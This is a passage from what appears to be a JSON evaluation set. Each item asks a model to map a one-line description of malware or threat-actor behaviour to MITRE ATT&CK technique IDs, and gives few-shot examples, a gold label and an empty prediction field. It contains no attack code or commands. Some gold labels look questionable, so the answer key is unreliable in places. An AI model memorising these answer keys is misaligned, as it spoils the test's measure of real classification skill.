T1568: Dynamic Resolution\n- Text: uses the Camellia cipher to encrypt communications.\n\t - T1573: Encrypted Channel\n- Text: AuTo Stealer can use TCP to communicate with command and control servers.\n\t - T1095: Non-Application Layer Protocol\n", + "input": "BITTER has used DDNS for C2 communications.", + "gold": "- T1568: Dynamic Resolution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Milan can identify users registered to a targeted machine.\n\t - T1033: System Owner/User Discovery\n- Text: Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization\u2019s email domain. If references are found, perform additional analysis to see if a data breach has occurred\n\t - T1114.001: Email Collection - Local Email Collection\n- Text: RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.\n\t - T1119: Automated Collection\n", + "input": "ShadowPad has collected the username of the victim system.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: malware gathers data from the local victim system.\n\t - T1005: Data from Local System\n- Text: Kerrdown can download additional software including Cobalt Strike from servers on the victim's network.\n\t - T1570: Lateral Tool Transfer\n- Text: Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations\n\t - T1095: Non-Application Layer Protocol\n\t - T1105: Ingress Tool Transfer\n", + "input": "Hikit can upload files from compromised machines.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KGH_SPY has the ability to set the \"HKCU\\Environment\\UserInitMprLogonScript\" Registry key to execute logon scripts.\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n- Text: SysUpdate can use a Registry Run key to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "JHUHUGIT has registered a Windows shell script under the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\" to establish persistence.", + "gold": "- T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: SDBbot has the ability to communicate with C2 with TCP over port 443.\n\t - T1095: Non-Application Layer Protocol\n- Text: Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n", + "input": "Mythic supports SSL encrypted C2.", + "gold": "- T1573.002: Encrypted Channel - Asymmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SombRAT can SSL encrypt C2 traffic.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: MacSpy uses Tor for command and control.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: can use SSL and TLS for communications.\n\t - T1573: Encrypted Channel\n", + "input": "Tor encapsulates traffic in multiple layers of encryption, using TLS by default.", + "gold": "- T1573.002: Encrypted Channel - Asymmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information\n\t - T1047: Windows Management Instrumentation\n- Text: Winnti for Windows can run as a service using svchost.exe.\n\t - T1569.002: System Services - Service Execution\n- Text: Pysa has the functionality to delete shadow copies.\n\t - T1490: Inhibit System Recovery\n", + "input": "RemoteCMD copies a file over to the remote system before execution.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attack starts with a malicious XLS attachment, sent in a phishing email, containing an obfuscated macro that downloads a heavily packed second-stage downloader. The second stage fetches the encrypted third-stage, which includes three layered encrypted Lokibot. After a privilege escalation, the third stage deploys Lokibot\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script\n\t - T1204.002: User Execution - Malicious File\n- Text: Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations.\n\t - T1585.002: Establish Accounts - Email Accounts\n", + "input": "EXOTIC LILY conducted an e-mail thread-hijacking campaign with malicious ISO attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SILENTTRINITY can establish a LNK file in the startup folder for persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Tropic Trooper has created a hidden directory under \"C:\\ProgramData\\Apple\\Updates\\\" and \"C:\\Users\\Public\\Documents\\Flash\\\".\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "TAINTEDSCRIBE can copy itself into the current user\u2019s Startup folder as \u201cNarrator.exe\u201d for persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: REvil has the capability to destroy files and folders.\n\t - T1485: Data Destruction\n- Text: All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n", + "input": "Derusbi is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After running within the %TEMP% path, Comnie will delete the original file\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services.\n\t - T1569.002: System Services - Service Execution\n- Text: Empire has modules for executing scripts.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Bazar can delete its loader using a batch file in the Windows temporary folder.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dtrack can retrieve browser history.\n\t - T1217: Browser Information Discovery\n- Text: During Operation Wocao, threat actors collected a list of installed software on the infected system.\n\t - T1518: Software Discovery\n- Text: Before the driver is loaded, the malware disables crash dump by setting the following registry key\n\t - T1070: Indicator Removal\n\t - T1562.006: Impair Defenses - Indicator Blocking\n\t - T1112: Modify Registry\n", + "input": "SUGARDUMP has collected browser bookmark and history information.", + "gold": "- T1217: Browser Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As happens so many times, it contains a Visual Basic script that will execute the malicious activities. This ZIP file contains a Python interpreter and Python script that is actually the RAT. The Word macro will unzip and execute the main script called \"launcher.py. The launcher script is responsible for checking the environment that the doc is currently being opened in. It assumes that all sandboxes will have hard drives smaller than 62GB. If it's in a sandbox environment, it will overwrite the malware scripts with the contents of the file \"License.txt\" and exit, thus deleting itself. Anti-sandbox code If it determines that it is not running in a sandbox environment, it will generate a unique ID, that is then replaced directly with the Python source code of the main scripts before executing it\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: KOCTOPUS can delete created registry keys as part of its cleanup procedure.\n\t - T1070: Indicator Removal\n- Text: Lucifer can use WMI to log into remote machines for propagation.\n\t - T1047: Windows Management Instrumentation\n", + "input": "Epic has a command to delete a file from the machine.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Moses Staff has used batch scripts that can enable SMB on a compromised host.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Chimera has copied tools between compromised hosts using SMB.\n\t - T1570: Lateral Tool Transfer\n- Text: can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n", + "input": "Ke3chang actors have been known to copy files to the network shares of other computers to move laterally.", + "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A string, that contains a PDB-path to debug symbols, suggests one such tool was named CredRaptor by the attackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer, Mozilla Firefox, and Opera\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Pony is a popular downloader program that can download additional malware onto the infected system. It is also equipped with a number of plugins that may be used to steal stored credentials for various applications such as FTP clients, web browsers, email clients, and other software. Pony is also commonly known as Fareit.\n\t - T1539: Steal Web Session Cookie\n\t - T1555: Credentials from Password Stores\n- Text: NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AADInternals can dump secrets from the Local Security Authority.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data\n\t - T1003.006: OS Credential Dumping - DCSync\n- Text: FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1552.006: Unsecured Credentials - Group Policy Preferences\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1588.002: Obtain Capabilities - Tool\n", + "input": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DPAPI.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Caterpillar WebShell has a command to modify a Registry key.\n\t - T1112: Modify Registry\n- Text: Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.\n\t - T1219: Remote Access Software\n- Text: Gelsemium has used dynamic DNS in its C2 infrastructure.\n\t - T1568: Dynamic Resolution\n", + "input": "During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and manipulate the Registry.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. The attackers also made extensive use of Hostinger\u2019s cheap web hosting services to deliver initial payloads\n\t - T1204.001: User Execution - Malicious Link\n- Text: KOCTOPUS has been distributed as a malicious link within an email.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Night Dragon enticed users to click on links in spearphishing emails to download malware.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EvilGrab has the capability to capture keystrokes.\n\t - T1056.001: Input Capture - Keylogging\n- Text: FIN8 harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as \u2018spwebmember\n\t - T1213.002: Data from Information Repositories - Sharepoint\n\t - T1018: Remote System Discovery\n\t - T1213.002: Data from Information Repositories - Sharepoint\n", + "input": "Ke3chang has used keyloggers.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: P8RAT can download additional payloads to a target system.\n\t - T1105: Ingress Tool Transfer\n- Text: Before writing a keystroke to the log, the malware obtains the current locale identifier using the \u2018GetKeyboardLayout\u2019 API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: Variable Name Description gdu Google Drive URL for downloading files to the Google Drive account gduu Google Drive URL for uploading files to the Google Drive account gdue Google Drive URL for updating a file on the Google Drive account gdo2t Google Drive URL used to get the OAUTH access_token client_id The client_id for the OAUTH application cs The client_secret for OAUTH r_t The refresh_token for OAUTH Table 6 Variables used to store settings needed to use Google Drive as a C2 To obtain an OAUTH access token to authenticate to the actor provided Google account, the Trojan sends an HTTP POST request to a URL stored in the gdo2t variable with grant_type, client_id, client_secret, and refresh_token fields added to the HTTP header and in the POST data\n\t - T1102: Web Service\n", + "input": "DEATHRANSOM can download files to a compromised host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Drovorub can exfiltrate files over C2 infrastructure.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Bazar can retrieve information from the infected machine.\n\t - T1005: Data from Local System\n- Text: Since the discovery of the {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll backdoor and its public analysis by multiple researchers, we observed some changes in the malware\u2019s configuration data. First, the authors started removing the names from the helper DLLs (DNSprov.dll and the two versions of HttpProv.dll). Then the operators stopped packaging the third DLL (second version of HttpProv.dll), choosing to embed just one\n\t - T1082: System Information Discovery\n", + "input": "Cryptoistic can gather data on the user of a compromised host.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows\u2019 Remote Desktop Protocol (RDP\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1078: Valid Accounts\n- Text: As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Dragonfly has dropped and executed SecretsDump to dump password hashes.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n", + "input": "Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Siloscape itself is obfuscated and uses obfuscated API calls.\n\t - T1027: Obfuscated Files or Information\n- Text: Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", + "input": "Zox has been encoded with Base64.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can download and execute an arbitary executable.\n\t - T1105: Ingress Tool Transfer\n- Text: WellMess can execute PowerShell scripts received from C2.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: KOCTOPUS has used VBScript to call wscript to execute a PowerShell command.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "LightNeuron has the ability to download and execute additional files.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As seen in Figure 2, the VBA code builds the email body and attaches the malicious document to the email. We\u2019ve seen both .docx and .lnk files being used as attachments. These are very similar to the content of the malicious attachments used in Gamaredon\u2019s initial spearphishing campaigns. Figure 3 shows an email generated by this malicious component\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: has sent malicious Word OLE compound documents to victims.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: RAR archiving \u2013 files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil \u2013 a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind \u2013 a command-line tool that can be used to perform Active Directory queries. Csvde \u2013 can be used to extract Active Directory files and data. Ntdsutil \u2013 can be used as a credential-dumping tool. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", + "input": "BITTER has used a RAR SFX dropper to deliver malware.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: specifically looks for Domain Admins, Power Users, and the Administrators groups within the domain and locally\n\t - T1069: Permission Groups Discovery\n- Text: KGH_SPY can collect information on installed applications.\n\t - T1518: Software Discovery\n- Text: Crutch has automatically exfiltrated stolen files to Dropbox.\n\t - T1020: Automated Exfiltration\n", + "input": "ShimRatReporter gathered the local privileges for the infected host.", + "gold": "- T1069: Permission Groups Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is 